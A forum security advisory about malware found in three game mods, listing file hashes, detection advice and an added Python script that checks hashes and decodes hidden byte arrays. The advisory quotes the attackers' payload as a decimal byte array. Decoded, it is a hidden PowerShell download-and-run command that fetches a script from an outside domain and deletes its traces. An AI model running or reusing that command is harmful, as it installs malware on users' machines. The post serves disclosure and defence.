📢 Attention about malware in mods

If you had installed the following mods:

  • "Auto Save on Exit" by Subaiy. MD5 hash - 6246fa47c492250128cbb4a463d2161a
  • "Kill Counter" by Daniel (if you downloaded this one: https://modworkshop.net/mod/56156 you are fine). MD5 hash - bcee56cc847489a2a328189ba882d95e
  • "Enemies Drop Better Loot" by Krunker (if you downloaded this one: https://modworkshop.net/mod/56230 you are fine). MD5 hash - ba9e7d88f1079c0324d53bde5786e4da

Your PC is likely infected with malware. Do a proper reset of your computer.

What are we gonna do next?

  1. We are going to look for moderators to look at new mods for RTV.
  2. We'll be looking into ways to improve the site itself to better protect against these bad actors and also to let users know if a mod was infected - https://modworkshop.net/thread/13229.

What can you do

  • Again, if you are infected, factory reset your computer.
  • Search for suspicious things in the mods you download (like "powershell").
    These attacks all follow the same pattern: they execute a PowerShell script using some encoded URL:
    [64,101,99,104,111,32,111,102,102,10,115,116,97,114,116,32,47,98,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,99,32,34,105,119,114,32,104,116,116,112,115,58,47,47,114,111,97,100,116,111,118,111,115,116,111,107,46,115,116,111,114,101,47,100,97,46,112,115,49,32,45,111,117,116,32,37,84,69,77,80,37,92,100,108,46,112,115,49,32,45,117,115,101,98,59,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,102,32,37,84,69,77,80,37,92,100,108,46,112,115,49,59,32,83,116,97,114,116,45,83,108,101,101,112,32,53,59,32,100,101,108,32,37,84,69,77,80,37,92,100,108,46,112,115,49,34,10,100,101,108,32,34,37,126,48,34]
  • Check the file hash of the file you downloaded using: https://hash-file.online.
  • Any mod containing a PowerShell script without a good reason should be reported to moderators.
  • Any mod that isn't open-source should be reported.

Is there any way to prevent this kind of thing from continuing to happen? Are mod files scanned before authors upload them?


Generally no, but we have moderators that actively look at mods and reports.

  • While in this case VirusTotal couldn't detect anything, you can try scanning it through VirusTotal just in case.
  • Search for suspicious things in the code, like "powershell"; there's little reason for mods to run OS.execute.
  • Look if the user isn't too new and has a track record of uploading working mods over time. A GitHub repo is usually a sign of a legit user.
    One of the banned users was an account from 2023 so it's not impossible for them to have dormant accounts on sites.
  • Ask around the community if a mod seems sus; AI can also detect fishy code.

In the end, if you find a mod is malicious, report it.
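
The two manual checks recommended in this thread can be scripted: comparing a download's MD5 against the hashes in the announcement, and searching a mod's code for "powershell" or OS.execute, including inside decimal byte arrays of the kind shown in the announcement. This is an added example, not part of the original posts or of modworkshop's tooling; the function names, the keyword list and the 8-value threshold are assumptions, and the sample input is constructed.

```python
import hashlib
import re

# MD5 hashes of the infected uploads, copied from the announcement in this thread.
KNOWN_BAD_MD5 = {
    "6246fa47c492250128cbb4a463d2161a": "Auto Save on Exit",
    "bcee56cc847489a2a328189ba882d95e": "Kill Counter",
    "ba9e7d88f1079c0324d53bde5786e4da": "Enemies Drop Better Loot",
}
# Keyword list is an assumption, taken from the strings named in the thread.
SUSPICIOUS = ("powershell", "os.execute")
# A run of 8 or more comma-separated decimal values; the threshold is an assumption.
BYTE_ARRAY = re.compile(r"\d{1,3}(?:\s*,\s*\d{1,3}){7,}")


def check_md5(data):
    """Return the listed mod name if the file's MD5 is a known-bad hash, else None."""
    return KNOWN_BAD_MD5.get(hashlib.md5(data).hexdigest())


def decode_byte_arrays(text):
    """Decode every decimal byte array in text into the string it hides."""
    decoded = []
    for match in BYTE_ARRAY.finditer(text):
        values = [int(v) for v in match.group().split(",")]
        if all(v < 256 for v in values):
            decoded.append(bytes(values).decode("latin-1"))
    return decoded


def scan_text(text):
    """Return sorted (layer, keyword) hits in the plain text and in decoded arrays."""
    layers = [("plain", text)] + [("decoded", d) for d in decode_byte_arrays(text)]
    return sorted({(name, kw) for name, layer in layers
                   for kw in SUSPICIOUS if kw in layer.lower()})


def scan_file(path):
    """Hash and scan one downloaded file; returns (known_bad_name, findings)."""
    with open(path, "rb") as handle:
        data = handle.read()
    return check_md5(data), scan_text(data.decode("utf-8", errors="replace"))


# Constructed sample: a harmless string hidden the same way, built at runtime.
SAMPLE = "var cmd = [" + ",".join(str(b) for b in b"start powershell.exe placeholder") + "]"

if __name__ == "__main__":
    print(scan_text(SAMPLE))  # [('decoded', 'powershell')]
```

Run `scan_file` on the downloaded file for the hash check and on each script inside the mod once it is unpacked. A hit is a reason to read the code and report the mod, not proof of infection.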


@luffy Your explanation was very detailed. If I come across any malicious mods, I’ll make sure to report them. Thank you for your work and dedication.
